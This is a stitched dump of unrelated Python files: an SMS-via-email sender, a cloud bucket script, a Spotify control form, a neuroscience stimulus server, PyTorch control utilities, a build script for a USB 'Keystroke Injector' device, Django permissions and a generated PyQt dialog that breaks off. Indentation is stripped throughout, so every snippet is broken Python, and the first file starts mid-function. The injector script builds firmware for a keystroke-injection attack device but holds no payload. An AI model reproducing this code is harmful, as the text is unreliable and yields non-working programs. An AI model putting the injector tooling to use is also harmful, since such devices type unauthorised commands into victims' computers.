"subject": kwargs.get(self.SUBJECT_KEY, self.DEFAULT_SUBJECT),
"mms": kwargs.get(self.MMS_KEY, self.DEFAULT_TO_MMS),
"yagmail": kwargs.get(self.YAGMAIL_KEY, self.DEFAULT_YAGMAIL_ARGS)
}
## Prepare the address to send to, return if it couldn't be generated
self.address = self._build_address(number, carrier)
if(not self.address):
return
## Prepare the passthru args for yagmail
yagmail_args = self.config["yagmail"]
if(username):
yagmail_args.insert(0, username)
yagmail_args.insert(1, password)
## Init the yagmail connection
try:
self.connection = yagmail.SMTP(*yagmail_args)
except Exception as e:
## You might want to look into using an app password for this.
self._print_error(e, "Unhandled error creating yagmail connection.")
return
## Send the mail if the contents arg has been provided, otherwise
## the send() method can be called manually.
if(contents):
self.send(contents)
## Methods
def _print_error(self, exception, message=None):
output = []
if(exception):
output.append(str(exception))
if(message):
output.append(str(message))
if(output):
joined = " ".join(output)
## Inefficient logic to aid in testing
if(not self.config["quiet"]):
print(joined)
return joined
else:
return None
def _load_gateways(self):
with open(self.GATEWAYS_JSON_PATH, "r") as fd:
try:
return json.load(fd)[self.GATEWAYS_KEY]
except Exception as e:
self._print_error(e, "Unhandled error loading gateways.json.")
return []
def _validate_number(self, number, region):
number = str(number).strip()
try:
parsed = phonenumbers.parse(number, region)
except phonenumbers.phonenumberutil.NumberParseException as e:
self._print_error(e, "NumberParseException when parsing the phone number.")
return False
except Exception as e:
self._print_error(e, "Unhandled error when parsing the phone number.")
return False
else:
if (phonenumbers.is_possible_number(parsed) and
phonenumbers.is_valid_number(parsed)):
return True
else:
self._print_error(None, "'{0}' isn't a valid phone number".format(number))
return False
def _validate_carrier(self, carrier):
carrier = str(carrier).strip()
for gateway in self.gateways:
if(gateway[self.CARRIER_KEY] == carrier):
return True
else:
self._print_error(None, "'{0}' isn't a valid carrier.".format(carrier))
return False
def _get_gateway(self, carrier):
for gateway in self.gateways:
if(gateway[self.CARRIER_KEY] == carrier):
if(self.config.get("mms")):
## Return mms gateway if possible, else return the sms gateway
if(self.MMS_KEY in gateway):
return gateway[self.MMS_KEY]
elif(self.SMS_KEY in gateway):
return gateway[self.SMS_KEY]
else:
## Return sms gateway if possible, else return the mms gateway
if(self.SMS_KEY in gateway):
return gateway[self.SMS_KEY]
elif(self.MMS_KEY in gateway):
return gateway[self.MMS_KEY]
else:
## This shouldn't happen.
self._print_error(None, "Carrier '{0}' doesn't have any valid SMS or MMS gateways.".format(carrier))
return None
def _build_address(self, number, carrier):
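        # Builds an email-to-SMS gateway address; e.g. number 5551234567 with
        # carrier "att" typically yields "5551234567@txt.att.net" (the exact
        # domain comes from gateways.json).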
## Load and ensure that there are gateways to check
self.gateways = self._load_gateways()
if(not self.gateways):
return None
## Validate the phone number and carrier
if (not self._validate_number(number, self.config["region"]) or
not self._validate_carrier(carrier)):
return None
## Get the SMS/MMS gateway for the carrier
gateway = self._get_gateway(carrier)
if(not gateway):
return None
return "{0}@{1}".format(number, gateway)
def send(self, contents):
## Prepare kwargs for yagmail.send()
yagmail_kwargs = {
"to": self.address,
"subject": self.config["subject"],
"contents": contents
}
## Send the mail
try:
self.connection.send(**yagmail_kwargs)
except Exception as e:
self._print_error(e, "Unhandled error sending mail.")
return False
else:
return True
# ---------------------------------------------------------------------------
from google.cloud import storage
bucket_name = "ml_model_store"
storage_client = storage.Client()
storage_client.create_bucket(bucket_name)
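# Note: create_bucket raises google.api_core.exceptions.Conflict if the
# bucket already exists, so a guard or try/except may be wanted here.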
for bucket in storage_client.list_buckets():
print(bucket.name)
# ---------------------------------------------------------------------------
from Domo.Modules import *
from Domo.API import ApiManager, ApiResponse, ApiCodes
from System.Collections.Generic import Dictionary
from System.Drawing import Point, Color, Size, Brush, SolidBrush
from System.Threading import Thread, ThreadStart
from System.Windows.Forms import (
Application,
Form,
DialogResult,
MethodInvoker,
Timer,
Label,
Button,
NumericUpDown,
ColorDialog,
TrackBar,
)
class SpotifyForm(TriggerModule):
form = None
def __init__(self):
pass
def OnEnable(self):
TriggerModule.init(self, SpotifySensor, SpotifyController)
ApiManager.RegisterListener("spotify", self.apiListener)
if self.controller.hardwareInterface.isInitialized:
self.formThread = None
self.formThread = Thread(ThreadStart(self.CreateForm))
self.formThread.Start()
pass
def OnDisable(self):
if self.form is not None and self.form.Visible:
self.form.Invoke(MethodInvoker(self.form.Close))
if self.formThread is not None:
self.formThread.Abort()
self.form = None
pass
def CreateForm(self):
self.form = SpotifyTestForm(self.sensor, self.controller)
Application.Run(self.form)
pass
def apiListener(self, request):
if request.arguments.ContainsKey("action"):
action = str(request.arguments["action"])
if action == "status":
return ApiResponse.Success(Dictionary[str, object](self.sensor.status))
elif action == "play":
if request.arguments.ContainsKey("track"):
self.controller.play(request.arguments["track"])
else:
self.controller.play()
elif action == "unpause" or action == "resume":
self.controller.unpause()
elif action == "pause":
self.controller.pause()
else:
return ApiResponse.Failed(ApiCodes.NotEnoughData, "The provided action was not recognized (action={0})".format(action))
return ApiResponse.Success()
else:
return ApiResponse.Failed(ApiCodes.NotEnoughData, "There is no action defined")
pass
class SpotifyTestForm(Form):
def __init__(self, sensor, controller):
self.Text = "Spotify Controls"
self.Name = "Test"
self.sensor = sensor
self.controller = controller
self.createControls()
self.startTimerLoop()
pass
def createControls(self):
l = Label()
l.Text = "Is Playing:"
l.Location = Point(10, 10)
self.Controls.Add(l)
self.playingLabel = Label()
self.playingLabel.Text = "false"
self.playingLabel.Location = Point(110, 10)
self.Controls.Add(self.playingLabel)
l = Label()
l.Text = "Track:"
l.Location = Point(10, 35)
self.Controls.Add(l)
self.trackLabel = Label()
self.trackLabel.Text = ""
self.trackLabel.Location = Point(110, 35)
self.trackLabel.Size = Size(150, 25)
self.Controls.Add(self.trackLabel)
l = Label()
l.Text = "Artist:"
l.Location = Point(10, 60)
self.Controls.Add(l)
self.artistLabel = Label()
self.artistLabel.Text = ""
self.artistLabel.Location = Point(110, 60)
self.artistLabel.Size = Size(150, 25)
self.Controls.Add(self.artistLabel)
b = Button()
b.Text = "Play"
b.Location = Point(10, 85)
b.Click += self.playClicked
self.Controls.Add(b)
b = Button()
b.Text = "Pause"
b.Location = Point(110, 85)
b.Click += self.pauseClicked
self.Controls.Add(b)
pass
def startTimerLoop(self):
timer = Timer()
timer.Interval = 2000
timer.Tick += self.timerTick
timer.Start()
pass
def timerTick(self, *args):
self.updateStatus()
pass
def playClicked(self, *args):
self.controller.play()
self.updateStatus()
pass
def pauseClicked(self, *args):
self.controller.pause()
self.updateStatus()
pass
def updateStatus(self):
self.playingLabel.Text = str(self.sensor.isPlaying).lower()
self.trackLabel.Text = self.sensor.track
self.artistLabel.Text = self.sensor.artist
pass
# ---------------------------------------------------------------------------
# Stimulation server extended from VisionEgg.PyroApps.EPhysServer
from distutils.version import LooseVersion as V
import os
import ast
import Pyro
import pickle
import logging
import pygame
import VisionEgg
import VisionEgg.PyroApps.EPhysServer as server
from StimControl.LightStim.Core import DefaultScreen
from StimControl.LightStim.LightData import dictattr
from VisionEgg.PyroHelpers import PyroServer
from VisionEgg.PyroApps.DropinServer import DropinMetaController
from VisionEgg.PyroApps.DropinGUI import DropinMetaParameters
class MyDropinMetaController(DropinMetaController):
def __init__(self,screen,presentation,stimuli):
Pyro.core.ObjBase.__init__(self)
self.meta_params = DropinMetaParameters()
self.p = presentation
class Targets(object):
def __init__(self, targets_list):
self.targets = targets_list
def __eq__(self,other):
if len(self.targets)!=len(other.targets):
return False
for i in range(len(other.targets)):
if not self.equal_target(self.targets[i],other.targets[i]):
return False
return True
def equal_target(self, left, right):
if isinstance(left, ast.Attribute) and isinstance(right, ast.Attribute):
return self.equal_target(left.value, right.value) and left.attr == right.attr
if isinstance(left, ast.Name) and isinstance(right, ast.Name):
return left.id == right.id
return False
class ModAssignments(ast.NodeTransformer):
def __init__(self, assign_exp):
ast.NodeTransformer.__init__(self)
self.new_assign = ast.parse(assign_exp).body[0]
def visit_Assign(self, node):
if Targets(node.targets) == Targets(self.new_assign.targets):
node.value = self.new_assign.value
return node
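
# Example (illustrative): ModAssignments("p.go_duration = (5.0, 'seconds')")
# visits a parsed script's AST and swaps in the new right-hand side wherever
# an assignment with the same target(s) appears.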
class RTEPhysServer(server.EPhysServer):
"""
    TODO: exec_AST should be interruptible from the client side.
"""
def __init__(self, *args,**kwargs):
server.EPhysServer.__init__(self,*args,**kwargs)
### hacking here to suppress annoying prints in log ###
self.stimdict['dropin_server'] = (MyDropinMetaController, self.stimdict['dropin_server'][1])
#######################################################
self.really_quit_server = False
self.AST_tree_completed = False
self.logpath = 'stimlog'
if not os.path.exists(self.logpath):
os.makedirs(self.logpath)
def build_AST(self, source, assignments=[]):
AST = ast.parse(source)
for assign in assignments:
AST = ModAssignments(assign).visit(AST)
self.AST = AST
self.AST_tree_completed = True
def exec_AST(self, screen):
code_module = compile(self.AST, '', 'exec')
exec code_module in locals()
if 'p' in locals() and isinstance(locals()['p'], VisionEgg.FlowControl.Presentation):
presentation = locals()['p']
elif 'sweep' in locals() and isinstance(locals()['sweep'], VisionEgg.FlowControl.Presentation):
presentation = locals()['sweep']
else:
raise RuntimeError('Cannot find presentation instance in locals().')
self.script_dropped_frames = presentation.were_frames_dropped_in_last_go_loop()
self.presentation.last_go_loop_start_time_absolute_sec = presentation.last_go_loop_start_time_absolute_sec # evil hack...
self.exec_demoscript_flag = False
self.set_quit_status(False)
def _set_parameters(self, dest_params, source_params):
for paramname, paramval in source_params.items():
setattr(dest_params, paramname, paramval)
def is_AST_tree_completed(self):
return self.AST_tree_completed
def set_AST_tree_to_build(self):
self.AST_tree_completed = False
def get_stimulus_params(self,eye,index=0):
logger = logging.getLogger('StimControl.StimServer')
params = dictattr()
with open('stimulus_params.pkl','rb') as pkl_input:
pkl_params = pickle.load(pkl_input)
try:
self._set_parameters(params, pkl_params[eye][index])
        except Exception:
            logger.error("Cannot get stimulus params for %s eye." % eye)
return None
else:
return params
def send_stimulus_params(self, eye, params):
try:
with open('stimulus_params.pkl','rb') as pkl_input:
preferences_dict = pickle.load(pkl_input)
if eye not in preferences_dict:
                preferences_dict[eye] = [{} for _ in range(2)]  # two distinct dicts, not one aliased twice
with open('stimulus_params.pkl','wb') as pkl_output:
preferences_dict[eye][0].update(params)
pickle.dump(preferences_dict, pkl_output)
        except Exception:
            raise RuntimeError('Cannot save params for ' + eye + ' viewport.')
def log_stimulus(self, exp_name):
# logging stimulus
logfile = self.logpath + os.path.sep + exp_name + '.log'
log_formatter = logging.Formatter('%(asctime)s (%(process)d) %(levelname)s: %(message)s')
log_handler_logfile = logging.FileHandler(logfile)
log_handler_logfile.setFormatter(log_formatter)
lightstim_logger = logging.getLogger('VisionEgg')
lightstim_logger.setLevel( logging.INFO )
lightstim_logger.addHandler(log_handler_logfile)
lightstim_logger = logging.getLogger('LightStim')
lightstim_logger.setLevel( logging.INFO )
lightstim_logger.addHandler(log_handler_logfile)
stimcontrol_logger = logging.getLogger('StimControl')
stimcontrol_logger.setLevel( logging.INFO )
stimcontrol_logger.addHandler(log_handler_logfile)
def get_stimulus_log(self, exp_name):
logfile = self.logpath + os.path.sep + exp_name + '.log'
with open(logfile) as log:
return log.readlines()
def is_running(self):
return self.exec_demoscript_flag
def set_quit_server_status(self, status):
self.really_quit_server = status
def quit_server_status(self):
return self.really_quit_server
def quit_presentation(self):
pass
class NewPyroServer(PyroServer):
def __init__(self):
Pyro.config.PYRO_MULTITHREADED = 1 # multithreading!
PyroServer.__init__(self)
def disconnect(self, _object):
try:
# pylint: disable=E1101
VERSION = Pyro.core.constants.VERSION
except:
VERSION = Pyro.constants.VERSION
if V(VERSION) >= V('3.2'):
self.daemon.disconnect(_object)
else:
# workaround bug in Pyro pre-3.2
del self.daemon.implementations[_object.GUID()]
_object.setDaemon(None)
class StimServer(object):
def __init__(self):
self.presentation = None
self.ephys_server = None
self.server_modules = [VisionEgg.PyroApps.DropinServer]
def start_server(self):
pyro_server = NewPyroServer()
default_viewports = ['left','right']
DefaultScreen(default_viewports)
screen = DefaultScreen.screen
perspective_viewport = VisionEgg.Core.Viewport(screen=screen)
overlay2D_viewport = VisionEgg.Core.Viewport(screen=screen)
self.presentation = VisionEgg.FlowControl.Presentation(viewports=[perspective_viewport, overlay2D_viewport]) # 2D overlay on top
self.presentation.parameters.handle_event_callbacks = [(pygame.locals.KEYDOWN, self.keydown_callback)]
self.presentation.between_presentations() # draw wait_text
self.ephys_server = RTEPhysServer(self.presentation, self.server_modules)
pyro_server.connect(self.ephys_server,"ephys_server")
# get listener controller and register it
self.presentation.add_controller(None,None, pyro_server.create_listener_controller())
        self.presentation.run_forever() # run until we get the first connection, which breaks out immediately
while not self.ephys_server.quit_server_status():
if self.ephys_server.get_stimkey() == "dropin_server":
self.presentation.parameters.enter_go_loop = False
# wait for client side quit status
self.presentation.run_forever()
if self.ephys_server.quit_server_status():
break
if self.ephys_server.exec_demoscript_flag:
self.ephys_server.exec_AST(screen)
def keydown_callback(self,event):
if event.key == pygame.locals.K_q:
self.presentation.parameters.quit = True
self.ephys_server.set_quit_server_status(True)
if __name__ == '__main__':
stim_server = StimServer()
stim_server.start_server()
# ---------------------------------------------------------------------------
import torch
from torch.autograd import Function, Variable
from torch.nn import Module
from torch.nn.parameter import Parameter
import operator
def jacobian(f, x, eps):
if x.ndimension() == 2:
assert x.size(0) == 1
x = x.squeeze()
e = Variable(torch.eye(len(x)).type_as(get_data_maybe(x)))
J = []
for i in range(len(x)):
J.append((f(x + eps*e[i]) - f(x - eps*e[i]))/(2.*eps))
J = torch.stack(J).transpose(0,1)
return J
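
# Usage sketch: central-difference Jacobian of an elementwise square,
# with J[i, j] ~= d f_i / d x_j (so here approximately diag(2*x)):
#
#   x = Variable(torch.ones(3))
#   J = jacobian(lambda v: v**2, x, eps=1e-4)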
def expandParam(X, n_batch, nDim):
if X.ndimension() in (0, nDim):
return X, False
elif X.ndimension() == nDim - 1:
return X.unsqueeze(0).expand(*([n_batch] + list(X.size()))), True
else:
raise RuntimeError("Unexpected number of dimensions.")
def bdiag(d):
assert d.ndimension() == 2
nBatch, sz = d.size()
dtype = d.type() if not isinstance(d, Variable) else d.data.type()
D = torch.zeros(nBatch, sz, sz).type(dtype)
I = torch.eye(sz).repeat(nBatch, 1, 1).type(dtype).byte()
D[I] = d.view(-1)
return D
def bger(x, y):
return x.unsqueeze(2).bmm(y.unsqueeze(1))
def bmv(X, y):
return X.bmm(y.unsqueeze(2)).squeeze(2)
def bquad(x, Q):
return x.unsqueeze(1).bmm(Q).bmm(x.unsqueeze(2)).squeeze(1).squeeze(1)
def bdot(x, y):
return torch.bmm(x.unsqueeze(1), y.unsqueeze(2)).squeeze(1).squeeze(1)
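
# Shape conventions for the batched helpers above (assumed semantics):
#   bger(x, y):  (B, n) x (B, m)    -> (B, n, m)  outer product
#   bmv(X, y):   (B, n, m) x (B, m) -> (B, n)     matrix-vector product
#   bquad(x, Q): (B, n), (B, n, n)  -> (B,)       x' Q x
#   bdot(x, y):  (B, n) x (B, n)    -> (B,)       dot product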
def eclamp(x, lower, upper):
# In-place!!
if type(lower) == type(x):
assert x.size() == lower.size()
if type(upper) == type(x):
assert x.size() == upper.size()
I = x < lower
x[I] = lower[I] if not isinstance(lower, float) else lower
I = x > upper
x[I] = upper[I] if not isinstance(upper, float) else upper
return x
def get_data_maybe(x):
return x if not isinstance(x, Variable) else x.data
_seen_tables = []
def table_log(tag, d):
# TODO: There's probably a better way to handle formatting here,
# or a better way altogether to replace this quick hack.
global _seen_tables
def print_row(r):
print('| ' + ' | '.join(r) + ' |')
if tag not in _seen_tables:
print_row(map(operator.itemgetter(0), d))
_seen_tables.append(tag)
s = []
for di in d:
assert len(di) in [2,3]
if len(di) == 3:
e, fmt = di[1:]
s.append(fmt.format(e))
else:
e = di[1]
s.append(str(e))
print_row(s)
def get_traj(T, u, x_init, dynamics):
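    # Rolls the dynamics forward for T steps from x_init under the control
    # sequence u; returns a (T, n_batch, n_state) tensor (assumed shapes).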
from .mpc import QuadCost, LinDx # TODO: This is messy.
if isinstance(dynamics, LinDx):
F = get_data_maybe(dynamics.F)
f = get_data_maybe(dynamics.f)
if f is not None:
assert f.shape == F.shape[:3]
x = [get_data_maybe(x_init)]
for t in range(T):
xt = x[t]
ut = get_data_maybe(u[t])
if t < T-1:
# new_x = f(Variable(xt), Variable(ut)).data
if isinstance(dynamics, LinDx):
xut = torch.cat((xt, ut), 1)
new_x = bmv(F[t], xut)
if f is not None:
new_x += f[t]
else:
new_x = dynamics(Variable(xt), Variable(ut)).data
x.append(new_x)
x = torch.stack(x, dim=0)
return x
def get_cost(T, u, cost, dynamics=None, x_init=None, x=None):
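    # Sums stage costs over the horizon with z_t = [x_t; u_t]: for QuadCost
    # each stage is 0.5 * z'Cz + c'z, otherwise cost(z_t); returns the
    # per-batch total objective.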
from .mpc import QuadCost, LinDx # TODO: This is messy.
assert x_init is not None or x is not None
if isinstance(cost, QuadCost):
C = get_data_maybe(cost.C)
c = get_data_maybe(cost.c)
if x is None:
x = get_traj(T, u, x_init, dynamics)
objs = []
for t in range(T):
xt = x[t]
ut = u[t]
xut = torch.cat((xt, ut), 1)
if isinstance(cost, QuadCost):
obj = 0.5*bquad(xut, C[t]) + bdot(xut, c[t])
else:
obj = cost(xut)
objs.append(obj)
objs = torch.stack(objs, dim=0)
total_obj = torch.sum(objs, dim=0)
return total_obj
def detach_maybe(x):
if x is None:
return None
return x if not x.requires_grad else x.detach()
def data_maybe(x):
if x is None:
return None
return x.data
# ---------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2021 Antmicro
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
LX_DEPENDENCIES = ["riscv", "icestorm", "yosys", "nextpnr-ice40"]
# Import lxbuildenv to integrate the deps/ directory
import lxbuildenv
import os, os.path, sys
import argparse
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.soc.integration.builder import *
from litex.soc.integration.soc import SoCRegion
from litex_boards.targets.kosagi_fomu import BaseSoC
from valentyusb.usbcore import io as usbio
from valentyusb.usbcore.cpu import eptri
from rtl.fomurgb import FomuRGB
from rtl.fomutouch import FomuTouch
from dfu import *
from autoboot import *
kB = 1024
def main():
## Read and parse arguments
parser = argparse.ArgumentParser(
description="Fomu Keystroke Injector - gateware/BIOS builder"
)
parser.add_argument(
"--seed", default=1, help="Seed to use in nextpnr"
)
parser.add_argument(
"--timeout", default=1, help="Timeout until Foboot switches to injector gateware"
)
builder_args(parser)
args = parser.parse_args()
## Image layout
binaries = {
# name, path, size
"bitstream": ["{build_dir}/gateware/{build_name}.bin", 0x20000], # 0x0
"bios": ["{build_dir}/software/bios/bios.bin", 0x08000], # 0x20000
"firmware": ["{build_dir}/software/firmware/firmware.fbi", 0x10000], # 0x28000
}
## Flash layout:
flash_offset_bitstream = 0x40000
flash_offset_bios = flash_offset_bitstream + binaries["bitstream"][1]
flash_offset_firmware = flash_offset_bios + binaries["bios"][1]
flash_offset_script = flash_offset_firmware + binaries["firmware"][1]
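    # Resulting offsets: bitstream 0x40000, bios 0x60000,
    # firmware 0x68000, script 0x78000.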
## Create SoC
soc = BaseSoC(bios_flash_offset=flash_offset_bios,
cpu_type="vexriscv", cpu_variant="minimal",
with_uart=False, with_led_chaser=False, with_spi_master=True
)
# Add LED driver block
rgb_pins = soc.platform.request("rgb_led")
soc.submodules.rgb = FomuRGB(rgb_pins)
soc.add_csr("rgb")
# Add touch buttons
    touch_pins = [soc.platform.request("user_touch_n", i) for i in range(4)]
soc.submodules.touch = FomuTouch(touch_pins)
soc.add_csr("touch")
# Add USB device controller
usb_pads = soc.platform.request('usb')
usb_iobuf = usbio.IoBuf(usb_pads.d_p, usb_pads.d_n, usb_pads.pullup)
soc.submodules.usb = eptri.TriEndpointInterface(usb_iobuf)
soc.add_interrupt("usb")
# BIOS/software constants
soc.add_constant("CONFIG_SIM_DISABLE_BIOS_PROMPT")
soc.add_constant("SPIFLASH_SKIP_FREQ_INIT")
soc.add_constant("TERM_MINI")
soc.add_constant("TERM_NO_HIST")
# Application must be running from RAM to be able to write data to SPI flash
soc.add_constant("MAIN_RAM_ADDRESS", soc.mem_map["main_ram"])
soc.add_constant("PART_GFS", flash_offset_bitstream)
soc.add_constant("FLASH_BOOT_ADDRESS", soc.mem_map["spiflash"] + flash_offset_firmware)
soc.add_constant("PART_SCRIPT", flash_offset_script)
# Build final SoC
builder = Builder(soc, **builder_argdict(args))
if not args.no_compile_software:
builder.add_software_package("firmware", os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "sw")))
builder.build(seed=args.seed)
if not args.no_compile_gateware:
# Set autoboot parameter
if autoboot_timeout(os.path.join(builder.output_dir, "gateware", f"{soc.platform.name}.bin"), args.timeout):
print("Autoboot timeout set to {} sec".format(args.timeout))
else:
print("Couldn't set autoboot timeout")
# Merge gateware and firmware into single binary
merge_image(binaries, builder.output_dir, soc.platform.name)
# Add DFU suffix to the final binary
vid = '5bf0'
pid = '1209'
add_dfu_suffix(os.path.join(builder.output_dir, f"{soc.platform.name}.bin"), vid, pid)
if __name__ == "__main__":
main()
# ---------------------------------------------------------------------------
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.mail import send_mail
class Permissions:
"""This is the base class for all custom permissions. To create a new permission set, subclass
this class."""
def __init__(self, model_name, app_label):
self.model_name = model_name.lower()
self.app_label = app_label
@classmethod
def from_model(cls, model):
return cls(model.__name__, model._meta.app_label)
def _template(self, action, detail=None, full=False, codename_only=True):
"""This method defines a common permission template which all permissions use and
should only be called by subclasses.
Parameters:
action (str): The action with which this permission is associated. Should be
all lower-case and snake-case.
detail (str): Additional detail about how the action and model are related. Should be
all lower-case snake-case.
full (bool): Whether the full permission name should be used (i.e. app name prepended)
codename_only (bool): Whether just the codename should be returned
Returns:
str or (str, str): Either the codename or (codename, name), depending on the
codename_only parameter
"""
model, prefix = self.model_name, f'{self.app_label}.' if full else ''
detail = '_' + detail if detail else '' # Prepend '_' if detail was provided
codename = f'{prefix}{action}_{model}{detail}'
name = f'Can {action} {model}{" ".join(detail.split("_"))}'
return codename if codename_only else (codename, name)
def all(self, full=False, codename_only=False):
"""Gets a list of all permissions"""
def is_permission(attr_name):
"""Returns true if attr_name refers to a permission method"""
attr = getattr(self.__class__, attr_name)
if callable(attr) and attr_name != 'all':
# True if attr is 1) not private and 2) not a class method
return not attr_name.startswith('_') and not hasattr(attr, '__self__')
return False
return [getattr(self, attr)(full, codename_only) for attr in dir(self.__class__) if is_permission(attr)]
class StatusPermissions(Permissions):
"""Permissions having to do with the status of an object."""
def change_needs_review(self, full=False, codename_only=True):
return self._template('change', 'needs_review', full=full, codename_only=codename_only)
def change_in_production(self, full=False, codename_only=True):
return self._template('change', 'in_production', full=full, codename_only=codename_only)
def reject_needs_review(self, full=False, codename_only=True):
return self._template('reject', 'needs_review', full=full, codename_only=codename_only)
def remove_from_production(self, full=False, codename_only=True):
return self._template('remove', 'from_production', full=full, codename_only=codename_only)
def push_to_production(self, full=False, codename_only=True):
return self._template('push', 'to_production', full=full, codename_only=codename_only)
class StatusEmail:
def __init__(self, obj):
self.obj = obj
self.model_name = obj.__class__.__name__
        self.perms = StatusPermissions.from_model(obj.__class__)
def needs_review(self):
perm = self.perms.change_needs_review(full=True)
users = get_user_model().objects.all()
recipients = [user.email for user in users if user.has_perm(perm)]
send_mail(
f'{self.model_name} needs review',
f'The {self.model_name.lower()} {self.obj} is ready for review.',
settings.STATUS_CHANGE_EMAIL_FROM,
recipients
)
def remove_from_production(self):
perm = self.perms.change_needs_review(full=True)
users = get_user_model().objects.all()
recipients = [user.email for user in users if not user.has_perm(perm)]
send_mail(
f'{self.model_name} removed from production',
f'The {self.model_name.lower()} {self.obj} has a problem and has been removed from production.',
settings.STATUS_CHANGE_EMAIL_FROM,
recipients
)
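# A minimal sketch (hypothetical 'Article' model in an 'articles' app) of how
# the pieces compose: subclass Permissions for a new permission set, then read
# the generated codenames.
#
#   class ArticlePermissions(Permissions):
#       def publish(self, full=False, codename_only=True):
#           return self._template('publish', full=full, codename_only=codename_only)
#
#   perms = ArticlePermissions.from_model(Article)
#   perms.publish()           # -> 'publish_article'
#   perms.publish(full=True)  # -> 'articles.publish_article'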
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_send_payout_dlg.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_SendPayoutDlg(object):
def setupUi(self, SendPayoutDlg):
SendPayoutDlg.setObjectName("SendPayoutDlg")
SendPayoutDlg.resize(832, 507)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(SendPayoutDlg.sizePolicy().hasHeightForWidth())
SendPayoutDlg.setSizePolicy(sizePolicy)
SendPayoutDlg.setSizeGripEnabled(True)
SendPayoutDlg.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(SendPayoutDlg)
self.verticalLayout.setObjectName("verticalLayout")
self.pnl_input = QtWidgets.QWidget(SendPayoutDlg)
self.pnl_input.setObjectName("pnl_input")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.pnl_input)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lay_input = QtWidgets.QHBoxLayout()
self.lay_input.setSpacing(8)
self.lay_input.setObjectName("lay_input")
self.label_3 = QtWidgets.QLabel(self.pnl_input)
self.label_3.setObjectName("label_3")
self.lay_input.addWidget(self.label_3)
self.cbo_address_source_mode = QtWidgets.QComboBox(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbo_address_source_mode.sizePolicy().hasHeightForWidth())
self.cbo_address_source_mode.setSizePolicy(sizePolicy)
self.cbo_address_source_mode.setMinimumSize(QtCore.QSize(0, 0))
self.cbo_address_source_mode.setMaximumSize(QtCore.QSize(160, 16777215))
self.cbo_address_source_mode.setObjectName("cbo_address_source_mode")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.lay_input.addWidget(self.cbo_address_source_mode)
self.sw_address_source = QtWidgets.QStackedWidget(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sw_address_source.sizePolicy().hasHeightForWidth())
self.sw_address_source.setSizePolicy(sizePolicy)
self.sw_address_source.setObjectName("sw_address_source")
self.wdg_address_source_1 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_1.sizePolicy().hasHeightForWidth())
self.wdg_address_source_1.setSizePolicy(sizePolicy)
self.wdg_address_source_1.setObjectName("wdg_address_source_1")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.wdg_address_source_1)
self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_6.setSpacing(1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.lbl_account = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_account.setObjectName("lbl_account")
self.horizontalLayout_6.addWidget(self.lbl_account)
self.cbo_hw_account_nr = QtWidgets.QComboBox(self.wdg_address_source_1)
self.cbo_hw_account_nr.setObjectName("cbo_hw_account_nr")
self.horizontalLayout_6.addWidget(self.cbo_hw_account_nr)
self.btn_add_hw_account_nr = QtWidgets.QToolButton(self.wdg_address_source_1)
self.btn_add_hw_account_nr.setObjectName("btn_add_hw_account_nr")
self.horizontalLayout_6.addWidget(self.btn_add_hw_account_nr)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.lbl_hw_account_base_path = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_hw_account_base_path.setObjectName("lbl_hw_account_base_path")
self.horizontalLayout_6.addWidget(self.lbl_hw_account_base_path)
self.sw_address_source.addWidget(self.wdg_address_source_1)
self.wdg_address_source_2 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_2.sizePolicy().hasHeightForWidth())
self.wdg_address_source_2.setSizePolicy(sizePolicy)
self.wdg_address_source_2.setObjectName("wdg_address_source_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.wdg_address_source_2)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
